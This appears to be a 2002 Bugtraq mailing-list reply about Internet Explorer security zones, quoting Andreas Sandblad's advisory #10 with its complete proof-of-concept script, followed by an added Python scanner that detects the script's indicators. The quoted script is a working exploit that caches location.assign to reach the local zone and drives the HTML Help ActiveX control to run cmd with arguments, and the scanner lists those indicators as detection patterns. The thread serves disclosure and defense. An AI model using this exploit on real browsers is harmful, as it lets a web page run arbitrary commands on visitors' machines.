Unless I am missing something, this is definitely not a vulnerability in itself but just a practical demonstration of the "assign method caching" vulnerability. Executing programs with or without parameters also becomes pointless once you have complete access to a local security zone (in this case, given by the "assign method caching" vuln), as demonstrated by http-equiv quite some times. Circumventing the zone barriers allows you to (among others) retrieve the location of that funny malware you just planted in the user's temporary internet files, and subsequently execute it.

The HTMLHelp Control used in this example only has the authority to execute commands at all because it is being used from a local security zone. As such, when Microsoft are claiming that "the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability", they are in my opinion correct.

Despite this, it is always interesting to have more approaches to program execution for demonstratory purposes once you get your foot inside the door of a local security zone, especially since the "codebase localpath" approach is practically filtered anywhere in its pure form.

IE6 SP1 did include some early attempts at preventing any interaction between security zones (specifically from the Internet zone to any local zone). That attempt was broken with the object redirect approach. It will be interesting to see what Microsoft comes up with next to prevent interaction between security zones.

Regards

Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com

-----Original Message-----
From: Andreas Sandblad [mailto:sandblad@acc.umu.se]
Sent: 6. november 2002 20:48
To: bugtraq@securityfocus.com
Subject: How to execute programs with parameters in IE - Sandblad advisory #10

--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
       'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  setTimeout('run()',1000);
}
function run() {
  f("javascript:document.write('<object id=c1 classid=clsid:adb"+
    "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
    "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
    "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
    "-00aa003b7a11><param name=Command value=Close></object>')");
  f("javascript:c1.Click();c2.Click();");
  close();
}
</script>
--------------------------- CUT HERE ---------------------------
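The following is an added example, not part of the thread and not code from either author: a small static scanner, written from the defender's side, for the indicators the quoted advisory exposes in page content (the HTML Help ActiveX CLSID, the ShortCut command parameter, showHelp calls, navigation to the res: and mk:@MSITStore: protocols, and a location.assign reference stored without being called, i.e. the "assign method caching" pattern). The indicator weights, the verdict threshold and the three sample documents are assumptions constructed for this example. The one non-obvious point it demonstrates is that the advisory splits the CLSID across JavaScript string concatenations, so a scanner has to join "..."+"..." seams before matching or it misses the control entirely.

```python
"""Static indicator scan for the cross-zone HTML Help command pattern.

Added example, not part of the original thread. Indicator strings come
from the quoted advisory; weights, threshold and samples are constructed
assumptions for illustration only.
"""
import re

# CLSID of the HTML Help ActiveX control, as used in the advisory.
HH_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# (name, pattern, weight). Weights are an assumption chosen for this example.
INDICATORS = [
    ("htmlhelp_activex_clsid",
     re.compile(r"clsid:" + HH_CLSID, re.I), 2),
    ("hh_shortcut_command",
     re.compile(r"name=['\"]?Command['\"]?\s+value=['\"]?ShortCut", re.I), 3),
    ("showhelp_call",
     re.compile(r"\bshowHelp\s*\(", re.I), 1),
    ("res_protocol_navigation",
     re.compile(r"location\s*=\s*['\"]res:", re.I), 2),
    ("msitstore_protocol",
     re.compile(r"mk:@MSITStore:", re.I), 2),
    # location.assign referenced but not called: the cached-method pattern.
    ("cached_location_assign",
     re.compile(r"=\s*(?:opener\.)?location\.assign\s*(?![\(\w])", re.I), 3),
]

SUSPICIOUS_THRESHOLD = 5  # assumption for this example


def normalise(source: str) -> str:
    """Join JavaScript string concatenations so split literals match.

    Removes every quote-plus-quote seam (including newlines and spaces
    between the pieces), reconstructing literals such as a CLSID that was
    written as "clsid:adb" + "880a6-...".
    """
    return re.sub(r"""["']\s*\+\s*["']""", "", source)


def clsid_visible(source: str) -> bool:
    """True if the HTML Help CLSID appears contiguously in the text."""
    return HH_CLSID.lower() in source.lower()


def scan(source: str) -> dict:
    """Return matched indicator names, a weighted score and a verdict."""
    text = normalise(source)
    hits = [(name, weight) for name, pat, weight in INDICATORS if pat.search(text)]
    score = sum(weight for _, weight in hits)
    return {
        "indicators": [name for name, _ in hits],
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "clean",
    }


# Constructed sample: mirrors the advisory's structure (split CLSID, cached
# assign, res: and mk: navigation) with a placeholder instead of a command.
SAMPLE_SUSPECT = r'''
<script>
f = opener.location.assign;
opener.location = "res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
f("javascript:document.write('<object id=c1 classid=clsid:adb" +
  "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value" +
  "=ShortCut><param name=Item1 value=\",placeholder,\"></object>')");
</script>
'''

# Constructed sample: ordinary navigation, assign() is called directly.
SAMPLE_BENIGN = r'''
<script>
function go(page) {
  // direct call, no method reference is stored
  location.assign(page);
}
</script>
<a href="#" onclick="go('intro.html')">Start</a>
'''

# Constructed sample: a lone showHelp call scores below the threshold.
SAMPLE_HELP_ONLY = '<script>showHelp("manual.chm");</script>'


if __name__ == "__main__":
    for label, doc in (("suspect", SAMPLE_SUSPECT),
                       ("benign", SAMPLE_BENIGN),
                       ("help-only", SAMPLE_HELP_ONLY)):
        print(label, scan(doc))
```

The scoring is deliberately cumulative: a page that merely calls showHelp or embeds the control is not flagged on its own, while the combination of a cached assign reference, a res: navigation and the ShortCut command is. The normalisation step is the part worth carrying into any real content filter; matching on the raw text of the advisory would report no CLSID at all.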